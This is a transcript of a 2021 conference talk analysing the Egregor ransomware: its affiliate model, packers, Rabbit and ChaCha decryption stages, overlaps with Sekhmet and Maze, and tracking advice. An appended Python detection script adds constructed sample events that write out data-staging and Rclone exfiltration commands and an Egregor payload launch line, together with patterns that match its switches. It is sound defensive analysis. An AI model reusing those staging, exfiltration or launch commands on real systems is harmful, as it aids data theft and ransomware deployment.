
Egregor Awakens: Taking A Tour Of A Threat Actor’s New Digs by Lindsay Kaye

BSides Dublin · 2021 · 29:42 · Published 2021-05
Category: Technical · Style: Talk
About this talk
View slide decks and full list of talks available at: https://www.bsidesdub.ie/past/2021.php
Transcript [en]

Hi everyone, my name is Lindsay Kaye, and today I'm going to talk to you a little bit about Egregor Awakens: Taking a Tour of a Threat Actor's New Digs. A bit about me: as was mentioned, I'm by trade a malware analyst and reverse engineer, and I particularly like taking apart weird cryptography during my analysis, so I'll talk a little bit about that in this talk. Currently I run Insikt Group's technical team at Recorded Future; Insikt Group is the threat intelligence team for the company. So today we're going to start with some background on Egregor, then we're going to do a technical deep dive, talk about some technical overlaps with other threat actors, and then finally finish up with ways to track Egregor.

For those of you who aren't familiar with Egregor, they began operating in September 2020 and they're considered a variant of the Sekhmet family. Around the same time, in September 2020, Maze, another ransomware family, stopped encrypting new victims. So at the time that Maze went down, Egregor started coming up, and it's suspected that many affiliates of the Maze ransomware variant have likely moved to the Egregor ransomware-as-a-service group. Like many big game hunting ransomware groups, they do the name-and-shame of victims on their extortion site, Egregor News, and you can see an example of one of these name-and-shame instances on Egregor News in the image on the right. In mid-February, members of the Egregor ransomware-as-a-service were actually arrested in Ukraine, and since about 2/12/21 we saw their infrastructure, so their C2s and that leak site, go down. Since then they've stopped encrypting new victims and they don't appear to have rebuilt their infrastructure, suggesting that they are no longer active.

For those of you who aren't familiar with what ransomware-as-a-service is, I'll give you a brief explanation. The concept of ransomware-as-a-service starts with a ransomware developer who creates ransomware code. This individual is technical enough to write the code, create it, package it up, and then make it something that could actually be effective on a victim system. Then another group of individuals, called affiliates, can either buy or lease this malware to execute their own attacks. These individuals really don't have to be technical or capable of writing their own ransomware, but they have to have some sort of appetite and desire to conduct ransomware attacks themselves. The developer, if these affiliates are successful in getting a ransom from an organization, will usually get some cut of that ransom, so that's how the business model works. And because Egregor uses that ransomware-as-a-service model, you'll notice, and we'll talk a little bit about this, the TTPs observed in the attacks will vary. All these different affiliates will bring different techniques around initial access, so how they initially get on the victim system; some of the pre-encryption things that they'll use, so lateral movement, how they move around the victim's network and get to other parts of it, because really they want to create maximum impact, so making sure you can encrypt as much as possible is key; and reconnaissance, so collecting information about the victim, the organization, other information that might be valuable to them in, again, increasing the impact of their attack; and then doing some sort of credential stealing, so enabling further access or more extensive access. But really this can extend to tools used in any stage of the attack, so sometimes you'll see, between the initial access and the dropping of the ransomware, additional tools dropped based on the desire of the affiliate, the needs of the attack, what the organization's security looks like, and really what they're trying to accomplish. It's also worth noting that some affiliates either may be or have been involved with other ransomware groups, so they might not just be working for this one ransomware-as-a-service group but might be working for others as well. And it's key to know that while some ransomware-as-a-service groups are free for whoever to join if they'd like, some are very exclusive and invite-only.

To give you an idea of exactly how prolific Egregor was while it was active, by the end of 2020 they had claimed 206 victims. This included many large, well-known organizations that I'm sure you've heard of. To give you an idea of how this was distributed, if you look at this graph of ransomware attacks by family through November 2020, you'll see that Maze represents about 26 percent of the attacks, but keep in mind at this time Maze had been active for the better part of about nine months. If you look at Egregor at this point, they'd only been active for about two and represented about 13 percent. So they spun up very quickly and then really got to their whole encrypting and victimizing of organizations.

In order to understand how Egregor ransomware attacks unfold and the tools that they use, I've divided the attack into four main stages. Initial access, like we talked about, so how the threat actor gains access to the organization's system. Then lateral movement and reconnaissance, so this is that dwell time, and dwell time could last anywhere between a couple of hours or up to days or weeks; it really does vary based on the affiliate involved and different groups and what their needs are. I wasn't able to find any statistics on the average dwell time for an Egregor attack, but I would suggest that it might not be very meaningful given the fact that there are so many different affiliates involved, and it very likely depends on which affiliate is doing what and what the needs of their attack are. Moving on to data exfiltration, because as you can imagine extortion is more effective when you have something to extort the organization with. This will be where the threat actor exfiltrates the victim's data so that they can post it on their leak site and then attempt to use it to have the organization provide them with money so that they take it down and don't leak it. And then finally the dropping of the ransomware, which I'm sure is the most familiar part to all of us of a ransomware attack, and obviously the one that creates the most notice, because now your victim system is suddenly encrypted.

To look at some of the tools that are used in association with Egregor attacks at each stage, let's start with initial access. Here what we observed is primarily three fairly common techniques. Phishing is used among APTs as well as a lot of other big game hunting ransomware; really everybody does use phishing. And then RDP exploits and VPN exploits, so we've seen those different kinds of techniques used with many other big game hunting ransomware. So really nothing super Egregor-specific or distinctive there, but again these are effective and fairly popular among threat actors. Moving into the lateral movement and reconnaissance stage, I'm sure you see a bunch of tools that you're super familiar with. Cobalt Strike, right, everybody uses Cobalt Strike; that's a little bit facetious, but many actors within the APT space as well as big game hunting ransomware. It is an openly available tool that you can purchase on the internet, similar to the idea of QakBot or IcedID, popular banking trojans that we see used, and finally Advanced IP Scanner. So again we're not really seeing anything highly specific or distinctive to the actual Egregor ransomware family, but really just a lot of commodity, openly available, popular malicious-behavior-type tools here to enable this stage of the attack. Then moving into data exfiltration, you're probably familiar with Rclone and 7-Zip for their benign use cases, and this is probably where you start to get pause. Arguably the extortion part of the attack is one of the most impactful for an organization, because this is the hardest thing to really mitigate, right? You may be able to detect tools in the lateral movement stage and have anti-ransomware and anti-phishing protections present, but the exfiltration of the data and the extortion is something that is incredibly impactful and also, as you can see, somewhat hard to detect. Having to decide whether the presence of 7-Zip on a system is being used for malicious or benign purposes is fairly complex, and we'll talk more about that later. And then finally the dropping of the malware, which is really where we see that first Egregor-specific tool that is dropped, so the Egregor ransomware, which we'll dive into. I thought this was fairly interesting: in one of their attacks Egregor actually print-bombed their ransom note to all the printers of that organization, and so you can see here a picture of a receipt printer at the organization printing out copies of their ransom note, which I thought was particularly interesting and kind of snarky.

Looking at the Egregor ransomware payload, there are really three layers to this payload: first the stage one packer, of which I saw obfuscated and unobfuscated versions, a stage two packer, and the Egregor payload itself. In order to successfully execute this payload, you need to provide the correct cryptographic key at runtime, so no key, no execution. And the payload accepts several different command line arguments to determine its functionality and behavior; we'll talk a little bit about that soon.

Starting with that stage one packer, as I mentioned, I saw two different versions, an obfuscated and an unobfuscated version, and to the right you can see the unobfuscated version, mostly just because it's a lot easier to see what's going on there and really talk about its functionality. To me this suggests it's probably some sort of compile-time obfuscation utility, because the obfuscated and unobfuscated ones were semantically so similar, so it's probably not something where the threat actor wrote completely different code to accomplish it, but probably a compile-time step that post-processed it and made it look obfuscated. So let's talk about this. You can see the baked-in cryptographic key material; it uses a ChaCha cipher, so as you can see the key expansion constant, that is the cryptographic key material. Because the key material is provided, there's really nothing that will prevent the execution of this stage and the unpacking and decryption of the next stage. So really what it's doing is functioning to obfuscate what is contained within this binary, fairly common for packers to do. Overall all of them were very similar with some very slight differences. First the command line parameter that was passed, so here it's dash-dash no-operation; I saw a whole variety of others, not really super meaningful to the functionality of the stage one packer. The XOR value that was used in the base64 decode and XOR function to decode that base64 key, generally I saw three or four used as the XOR key, but it can vary. And then finally the crypto key and initialization vector that were used in those key functions; again, not really impactful because ultimately all the key material is provided, so we're off to the races.

Another interesting thing about the stage one packer is that some of them actually had baked-in PDB paths that were really fairly similar to each other. I saw a lot of things that sort of m ewtk and m schustp, and if you look at the big chart on the right, it's the approximate count of how many instances of each PDB path I saw in the collection of samples I had. This could suggest that there are multiple individuals compiling the code, with some of them being more active than others, but this also could just be the distribution of samples that I was able to acquire. Ultimately PDB is fairly easy to modify per build, so while these patterns are super interesting, noting that it's not necessarily deterministic, you know, if this PDB path is the same between two samples it's absolutely the same individual; but it is worth noting. Sometimes you'll see other threat actors, Maze in particular, use the PDB path to make snarky comments or rude jokes against other security researchers, so I just wanted to highlight this for our discussion.

Moving on to that stage two packer, here's where things start to get interesting. Pretty much how this works is there's a function that first reads the command line and is looking for that password that we talked about after the -p, so it has to be passed at runtime, and this password is then passed to a Rabbit decryption function. If you're not familiar with the Rabbit cipher, you're not alone; generally this is fairly uncommon to see used in ransomware, and generally I'll see crypto algorithms like RC4, DES, triple DES, AES. So Rabbit was fairly uncommon to be observed here, but that's what they use. After the decryption takes place, the next function looks for an MZ header, so whether or not it has decrypted a valid PE file, so has successfully decrypted the actual ransomware payload, and if it does, it runs it. Here, as you can imagine, if you do not pass the correct cryptographic key you will not successfully decrypt it, and then it will be game over. So for samples that you do not have the right cryptographic key for, this is where they stop executing, and no ransomware is deployed and nothing else takes place.

If you actually succeed in decrypting the Egregor payload, this is what you get: fairly typical ransomware behaviors, doesn't really stick out as particularly novel in terms of what it does. It'll do the language checks for the Commonwealth of Independent States countries, fairly common to be doing, and if it finds that the computer is associated with one of those languages, it will stop executing. It will delete the shadow copies using WMI; this is also another pretty common thing to do to really make recovery more difficult for the victim. Stopping processes and services that again aid in recovery or backup of the system. And then finally, because it is ransomware, it does encrypt the files on the system, except for specific file extensions and folders, predominantly those that would enable the computer to function, so executables, DLLs, things like that, because as you can imagine if you encrypt all of those the computer no longer functions, and even if the person does pay the ransom it's going to be very hard to decrypt their stuff because the computer no longer functions. You can see an example of what the ransom note looks like that is dropped; we saw an example of that being printed on a receipt printer, but here's a slightly bigger example for you to look at.

As I mentioned, Egregor and Sekhmet are fairly related and it borrows very heavily from the Sekhmet code, so they have very similar processes terminated, like I talked about, to make recovery more difficult for the victim; the extensions and file names that they avoid encrypting, again like I talked about; the name of the ransom note file itself, they both use RECOVER-FILES.txt; the way that they rename encrypted files, so they append an extension to the end of the file to show it's encrypted and the victim notices something is wrong; and the string encryption method as well. Like I said, I love talking about weird encryption, so you can see the pseudocode for the string encryption on the bottom right that I put together. This is a fairly simple, I would say, XOR cipher; XOR-based type ciphers are fairly common as obfuscation mechanisms used by different ransomware groups and other APTs, but this is not a specific one that I had seen before, and they are absolutely identical between Egregor and Sekhmet, suggesting that there is some sort of relation, though anybody could really probably incorporate this into their ransomware themselves if they felt like it, or other pieces of code. But this is exactly how they do the string decryption; I thought it was cool. Additionally, the method of code obfuscation that is used: Egregor is not a very straightforward payload, and they obfuscate the code, specifically the control flow. If you look at the top two images on the slide, that gives you some idea of some of the techniques that they use, and try to remember this for our next slide or shortly. So the jump-if-zero and jump-if-not-zero, fairly common, makes it harder for a reverse engineer to understand the control flow and does do some to confuse the tools that we use. Finally, they had a highly similar first stage packer, so remember that packer we talked about with the baked-in key material that uses the ChaCha cipher; I saw very similar first stage packers used in both.

There are a few key differences between Egregor and Sekhmet though. The first one is that Egregor does contain code for an HTTP POST network request, but it doesn't appear to be triggered at any point; in Sekhmet this code is used and actually does the POST. It's worth noting because maybe this is vestigial code that has been left over that the developers did not take out. Also, Sekhmet only has two stages, so remember Egregor has three, and does not require a password. Sekhmet has that first stage packer that we said was very similar and the Sekhmet ransomware, but what it's missing is that middle stage with the Rabbit decryption that takes in the password and tries to decrypt the payload. So again no password is required, and if you double-click on some Sekhmet you will in fact get ransomed; Egregor requires a password, Sekhmet does not. Additionally, Egregor adds a couple of different command line parameters, so --samba, which means link files will not have a delete-on-close attribute, and --killrdp, which is self-explanatory. Finally, the file names of the dropped files as part of the ransomware attack differ: Egregor uses dtb.dat and Sekhmet uses sysconfig.db.

I hear a lot of people talk about similarities between Maze and Egregor, and we alluded to that in the beginning, but I wanted to highlight a couple of the differences that I saw at the technical level in the code itself. First, they use substantially different obfuscation techniques. For example, Maze does import obfuscation, so it makes it harder to tell which functions are imported to be used in the binary, using this import hashing technique that I show at the top right in that image; Egregor doesn't do any sort of import hashing, so there's one key difference. And Maze doesn't appear to obfuscate their strings in any way, while Egregor does, so two key different approaches to obfuscation worth highlighting as well. Additionally, the packers and first stages are very different. Like I mentioned, there is a fairly consistent group, like that one first stage packer used with Egregor, but there's a huge variety with Maze. Maze also has an affiliate program, and this is likely an artifact of that: different affiliates will join the program and likely bring tools, techniques, different sorts of capabilities with them from previous gigs, or just because that's what they have, so either things they write themselves to pack it or packers that are commodity that they purchase or acquire in some way. That's probably the reason for so much variety with Maze versus that one that we really saw with Egregor. And then there were different code obfuscation techniques. As we saw with Egregor, they did one kind of code obfuscation; Maze's code obfuscation was, I would say, significantly more extensive, and there are many different techniques used. I'm not going to go into these in a lot of detail, but you can see them in the two images on the right. Some researchers have done a really great breakdown of these techniques and really explained what is going on here, so that's definitely worth checking out if you want. But there was a pretty similar-looking country check. We talked about the Commonwealth of Independent States country check, and you can see in the bottom left the Egregor country language check and the Maze language check look very familiar, so I wouldn't consider this a smoking gun, but in order to do this discussion justice I am pointing it out.

So, yes Lindsay, that is just code, what else? Yes, the diamond model does not go away, so we can't just look at things from the technical perspective here; we have to think about these ransomware attacks in relation to the victims, the adversaries and the infrastructure that is involved. Let's talk about why that is. Ransomware affiliates are moving to new variants, operations are spinning up and spinning down over the course of the year, we talked a lot about the commodity tools that have been used, and so this really starts to blur, from a technical perspective, the obvious hallmarks of specific threat actors or variants. Here's why that is. As Chainalysis points out, they believe that blockchain analysis, so a lot of the cryptocurrency things that are involved, suggests that there's affiliate overlap and other possible connections between Maze, Egregor, SunCrypt and DoppelPaymer, so four, I guess, very well-known ransomware groups. Cobalt Strike, which we've talked about, was actually used in 70 percent of the big game hunting incidents in 2020. So you remember that large pie chart of all the different threat actors that were doing ransomware attacks in 2020; 70 percent of the big game ones actually used this one tool, so it's not a very distinctive indicator of any one group in particular, just bad behavior. RDP is the most common attack vector employed to install ransomware, which Egregor used, and then VPN vulnerabilities really aren't far behind, and then like I said before, everyone uses phishing. So really what we're looking at from the technical perspective is a lot of hallmarks of threat actors and malware at a broad technical level, but we're really not seeing anything very ransomware-family-specific until we get to that actual malware. That's why context remains super important.

What does this mean for us as defenders? There is some good news, because many of these same TTPs are used between ransomware threat actors, so this really helps us focus our detections and mitigations on some of these common issues and common tools: different vulnerabilities, different vulnerable products, really being aware of what these are so that we can start to protect them. In its advisory on Egregor ransomware, the FBI advised patching several RDP vulnerabilities from 2019 and 2020, and while these were in association with Egregor, there's no reason that other threat actors aren't using them now, which they might be, and may not use them in the future. So potentially, even though Egregor doesn't seem to be very active anymore, by protecting against these vulnerabilities we may be heading off some other avenues that other big game hunting ransomware threat actors will be using. But there's also bad news. They're still using these TTPs because they're succeeding with them. Phishing will always be a problem; while you have people, they will click on things, and the lures are only getting more creative, more stealthy and more interesting to potential victims. Additionally, as we all know, patching takes resources and may fall by the wayside as your resources are handling whatever is top of mind or super critical right now, and you may not even be able to patch all of the potential vulnerabilities that exist for all the ransomware threats and other kinds of threats that you're afraid of. And then finally, separating the good versus bad use of tools is difficult. We talked about the presence of 7-Zip being used for data exfiltration; for an organization to decide whether the presence of 7-Zip on their system is good or bad, it's doable, it's not insurmountable, but it is very difficult, especially given the size of many organizations and the diversity of tools and the difficulty to truly baseline and understand what a malicious use of 7-Zip really looks like and detect it and then thwart it. And the worst news of all is that if they need to, they will evolve their TTPs. As I'm sure you're aware, there's big money in big game hunting, and while it is still profitable, people will still do it. And remember those affiliates: they're moving between programs, they're learning new skills, bringing new tools, so while you may be aware of what they're using now, keep in mind that as new affiliates join and move around, these techniques will evolve over time, and then we'll start to see a lot more diversity associated with any specific type of threat actor.

If you're interested in tracking Egregor, there are a couple of approaches we could take. First, monitoring for unexpected commodity and openly available tools like they use, so specifically QakBot and Cobalt Strike. Again, these aren't Egregor-specific, but they are commonly used with ransomware deployments, as I've mentioned, and generally they're a precursor to many kinds of unsavory behavior, so again more bang for your buck detecting those, and Recorded Future has actually created Sigma rules and YARA rules for some of these tools. But if you want to track Egregor specifically, a couple of things that you can look at: that second stage with the Rabbit decryption is actually extremely consistent between the samples, even at the byte level; the string decryption technique used in the final payload, which is shared between both Egregor and Sekhmet, was a fairly consistent indicator of Egregor, and as I mentioned, I hadn't really seen it anywhere else; and then finally that first stage decryption process, with the XOR, the ChaCha cipher, the check for the valid PE file and then sleep if it fails, was also something that could be tracked in association with Egregor itself.

So what's next, where are we? Now that the affiliates have been arrested, the Egregor operation is pretty likely dead. It's pretty likely that the operators themselves will move to a new operation, and it is possible to see some of the TTPs used, so again those commodity tools, but maybe also aspects of the actual code itself or different techniques that they developed that they found particularly successful, carry over to their new operation. Also worth noting, ransomware isn't going away anytime soon. Like I said, big game hunting is big business, and while it is profitable they will keep doing it. Name-and-shame has proven fairly profitable and successful for threat actors and it will likely remain popular, and then cartels, in which threat actors team up and share different resources, so things like leak sites and infrastructure, will also probably remain popular as we move forward. With that, thank you so much, I'm Lindsay Kaye, thank you for attending my talk. Sammy, do we have any questions?

We actually do, Lindsay, and thanks very much for the talk first of all, and we have a couple of minutes for questions. We have a question here: how common is the CIS exclusion across different ransomwares?

The CIS exclusion. Generally it will be in any sort of ransomware that is created by threat actors who are very likely in Eastern European countries, where executing this kind of attack on computers that are in that group of countries would be very, very bad. You'll see a lot of that there, so like I said, Maze does it, I believe a couple of the other big game hunting ransomware families do it; I saw a sample the other day, I believe it was DearCry, that doesn't. So I would say that a lot of the more famous names of ransomware that are created in probably Eastern Europe are more likely to have it versus not, and those are a lot of the really sophisticated ones that we hear a lot about.

Brilliant, thank you. And one more thing: so Egregor is pretty much dead, as you said, it's on its way out, but those criminals are going to move on to new operations, potentially using the same TTPs, so what would be your advice on mitigating or protecting against the threat of Egregor or the next thing that comes after Egregor using the same TTPs?

Sure. Like I said, there are a couple of ways of getting more bang for your buck for detection. The best time to detect a ransomware attack is as early as possible, so at that phishing stage, but really looking at that dwell time stage, so the use of things like Cobalt Strike, a lot of the really popular banking bots and trojans, as I mentioned, frequently used; as I mentioned, those are generally precursors to all kinds of unsavory behavior. So really understanding what are those common TTPs among the big game threat actors; you'll see a lot of malicious use of those tools, but then you'll also see malicious use of a lot of living-off-the-land type techniques, so Windows tools themselves. Really trying to understand what are the tools and techniques that a lot of threat actors use, because they remain successful, and then looking to protect against and mitigate those, and also monitoring for their use.

That's brilliant, thank you very much, and that brings us to the end of this talk. Lindsay, thank you very much; the feedback on the chat is great, people love the talk, so thank you again for being with us today.

Thank you so much.
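As an added example, not code from the talk or from Recorded Future: two of the tracking points above, the 7-Zip-then-Rclone staging pattern the speaker calls hard to tell apart from benign use, and the Egregor payload command line carrying its `--samba` / `--killrdp` switches together with the runtime `-p` password, written as triage rules over constructed process-creation events. The event fields, hostnames, image paths, `payload.exe` and the password are assumptions constructed for this example.

```python
"""Triage rules for two signals from the talk, run over constructed telemetry:
  1. 7-Zip archive creation followed by an Rclone transfer on the same host
     (data staging, then exfiltration), and
  2. a command line carrying Egregor's --samba / --killrdp switches, from
     which the runtime -p password is extracted for later sample analysis.
EVENTS, hostnames, paths and the password are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re
import shlex

EVENTS = [  # constructed process-creation events, timestamps in UTC
    {"ts": "2021-02-01T09:12:03", "host": "WS-017", "user": "jdoe",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -pSummer2021 -mhe C:\Temp\staged.7z \\FS01\Finance\*"},
    {"ts": "2021-02-01T09:31:40", "host": "WS-017", "user": "jdoe",
     "image": r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Temp\staged.7z remote:drop --transfers 8"},
    {"ts": "2021-02-01T11:05:12", "host": "WS-022", "user": "build",  # benign: nothing follows
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a C:\Build\artifacts.7z C:\Build\out\*"},
    {"ts": "2021-02-01T13:47:55", "host": "WS-017", "user": "SYSTEM",
     "image": r"C:\Windows\Temp\payload.exe",                        # placeholder image name
     "cmdline": r"payload.exe -pGb1fQz9 --killrdp --samba"},
]

STAGE_WINDOW = timedelta(minutes=60)          # archive -> upload gap worth pairing
ARCHIVER = re.compile(r"(^|\\)7z[ag]?\.exe$", re.I)
SYNC_TOOL = re.compile(r"(^|\\)rclone\.exe$", re.I)
UPLOAD_VERBS = {"copy", "sync", "move", "copyto"}
EGREGOR_SWITCHES = {"--samba", "--killrdp"}   # the two Egregor-only switches from the talk


def tokens(cmdline):
    # posix=False keeps Windows backslashes and quoted paths intact
    return shlex.split(cmdline, posix=False)


def find_staging_then_exfil(events, window=STAGE_WINDOW):
    """Pair each 7z 'a' (add to archive) with a later Rclone transfer on the same host."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)
    hits = []
    for host, evs in by_host.items():
        archives = [e for e in evs if ARCHIVER.search(e["image"])
                    and len(tokens(e["cmdline"])) > 1 and tokens(e["cmdline"])[1].lower() == "a"]
        uploads = [e for e in evs if SYNC_TOOL.search(e["image"])
                   and len(tokens(e["cmdline"])) > 1 and tokens(e["cmdline"])[1].lower() in UPLOAD_VERBS]
        for a in archives:
            for u in uploads:
                gap = datetime.fromisoformat(u["ts"]) - datetime.fromisoformat(a["ts"])
                if timedelta(0) <= gap <= window:
                    hits.append({"host": host, "archive_ts": a["ts"], "upload_ts": u["ts"],
                                 "minutes": int(gap.total_seconds() // 60)})
    return hits


def find_egregor_cmdlines(events):
    """Flag command lines with --samba/--killrdp and pull out the -p password.
    -p alone is far too generic (7-Zip uses it for archive passwords), so the
    Egregor switches are the trigger; the password is recorded because without
    it the stage-two Rabbit decryption cannot be reproduced during analysis."""
    hits = []
    for ev in events:
        toks = tokens(ev["cmdline"])
        switches = EGREGOR_SWITCHES & {t.lower() for t in toks}
        if not switches:
            continue
        password = None
        for i, t in enumerate(toks):
            if t.startswith("-p") and not t.startswith("--") and len(t) > 2:
                password = t[2:]                      # "-pSECRET" form
            elif t == "-p" and i + 1 < len(toks):
                password = toks[i + 1]                # "-p SECRET" form
        hits.append({"host": ev["host"], "ts": ev["ts"], "image": ev["image"],
                     "switches": sorted(switches), "password": password})
    return hits


if __name__ == "__main__":
    for hit in find_staging_then_exfil(EVENTS) + find_egregor_cmdlines(EVENTS):
        print(hit)
```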